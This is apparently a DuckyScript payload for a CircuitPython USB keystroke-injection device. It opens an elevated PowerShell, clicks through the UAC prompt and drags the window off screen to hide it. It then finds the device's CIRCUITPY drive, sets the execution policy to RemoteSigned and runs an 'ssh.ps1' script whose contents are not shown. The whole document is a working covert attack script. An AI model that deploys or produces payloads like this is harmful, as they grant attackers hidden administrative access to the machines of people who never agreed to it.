REM Open Powershell In Admin Mode
DELAY 5000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING start-process powershell -verb runas ; exit
ENTER
DELAY 1000
LEFTARROW
ENTER
ALT y
DELAY 100 
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
REM Get the drive letter of CIRCUITPY and store it in a variable
STRING $driveLetter = (Get-Volume | Where-Object { $_.FileSystemLabel -eq "CIRCUITPY" }).DriveLetter
ENTER
DELAY 1000
STRING $path = "$driveLetter" + ":" + "\SSHDucky"
ENTER
DELAY 100

STRING cd $path
ENTER
DELAY 100

STRING Set-ExecutionPolicy RemoteSigned
ENTER
DELAY 1000

STRING A
ENTER
DELAY 100

STRING .\ssh.ps1
ENTER
DELAY 5000
